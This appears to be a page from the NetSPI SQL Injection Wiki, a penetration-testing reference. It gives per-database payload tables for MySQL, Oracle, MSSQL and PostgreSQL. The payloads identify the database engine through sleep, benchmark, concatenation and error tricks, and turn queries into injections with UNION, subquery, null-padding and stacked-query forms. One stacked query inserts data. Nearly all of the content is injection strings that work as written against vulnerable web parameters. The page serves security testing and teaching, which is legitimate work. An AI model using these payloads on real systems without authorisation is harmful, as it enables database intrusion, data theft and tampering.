NetSPI SQL Injection Wiki
DBMS Identification
Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
Note: The comment characters -- are placed after the query to remove any commmands following our query, helping to prevent errors.
| Description | Query |
|---|---|
| SLEEP | page.php?id=1'-SLEEP(1)=0 LIMIT 1 -- |
| BENCHMARK | page.php?id=1'-BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds'))=0 LIMIT 1 -- |
| String concatenation | page.php?id=' 'mysql' -- |
| Functions | connection_id() -- row_count() -- POW(1,1) -- |
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.php?id=' |
General Tips
PHP applications generally have MySQL databases.
Converting queries to injections
Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT @@version will be the example query.
| Description | Query |
|---|---|
| Union | product.php?id=' UNION SELECT @@version -- |
| Union subquery | product.php?id=' UNION (SELECT @@version) -- |
| Union null Note: If original query returns more than one column, add null to equal the number of columns |
product.php?id=4 UNION SELECT @@version,null -- |
| Stacked Queries Note: Stacked queries do not always return results, so they are best used for injections that update/modify data. |
product.php?id='; INSERT INTO 'docs' ('content') VALUES ((SELECT @@version)) -- |
DBMS Identification
Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
Note: The comment characters -- are placed after the query to remove any commmands following our query, helping to prevent errors.
| Description | Query |
|---|---|
| String concatenation | page.jsp?id='||'oracle' -- |
| Functions | BITAND(1,1) -- |
| Default table | page.jsp?id='UNION SELECT 1 FROM v$version -- |
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.jsp?id=' |
General Tips
Depending on the error provided by the application, if there is an “ORA-XXXX" error where each X is an integer, that means the database is Oracle
JSP applications generally have Oracle databases.
Converting queries to injections
Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT banner FROM v$version will be the example query.
| Description | Query |
|---|---|
| Union | product.jsp?id=' UNION SELECT banner FROM v$version -- |
| Union subquery | product.jsp?id=' UNION (SELECT banner FROM v$version) -- |
| Union null Note: If original query returns more than one column, add null to equal the number of columns-1 |
product.jsp?id=' UNION SELECT banner,null FROM v$version -- |
DBMS Identification
Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
Note: The comment characters -- are placed after the query to remove any commmands following our query, helping to prevent errors.
| Description | Query |
|---|---|
| WAITFOR Function | page.asp?id=';WAITFOR DELAY '00:00:10'; -- |
| Default variable | page.asp?id=sql'; SELECT @@SERVERNAME -- |
| String concatenation | page.php?id='mssql'+'mssql' -- |
| Functions | @@rowcount -- SQUARE(1) -- @@pack_received -- |
| Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.asp?id=' |
| Error messages Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error. |
page.asp?id=@@SERVERNAME |
| Error messages Note: If the id parameter is an integer, the string value of the @@SERVERNAME variable can cause a conversion error. |
page.asp?id=0/@@SERVERNAME |
General Tips
ASP/ASPX based applications are generally MSSQL.
Converting queries to injections
Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT @@version will be the example query.
| Description | Query |
|---|---|
| Union | product.asp?id=' UNION SELECT @@version -- |
| Union subquery | product.asp?id=' UNION (SELECT @@version) -- |
| Union null Note: If original query returns more than one column, add null to equal the number of columns |
product.asp?id=' UNION (SELECT @@version,null) -- |
| Stacked query Note: Stacked queries do not always return results, so they are best used for injections that update/modify data. |
product.asp?id='; SELECT @@version -- |
DBMS Identification
Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
Note: The comment characters -- are placed after the query to remove any commmands following our query, helping to prevent errors.
| Description | Query |
|---|---|
| Sleep for 10 seconds | '||pg_sleep(10)-- |
| Default variables | SELECT current_user -- SELECT session_user -- |
| String concatenation | param='postg'||'resql' -- |
| Functions | version() -- SUBSTR() -- SUBSTRING() -- |
General Tips
Ending a query with a semicolon may cause an error (e.g. ' and 1=1;-- causes an error but ' and 1=1-- does not)
Converting queries to injections
Now that the injection has been identified, the rest of this guide will contain full queries. Use the methods below to insert those queries into your injection points. SELECT current_user will be the example query.
| Description | Query |
|---|---|
| Union | product.asp?id=' UNION SELECT current_user -- |
| Union null Note: If original query returns more than one column, add null to equal the number of columns |
product.asp?id=' UNION SELECT current_user,null -- |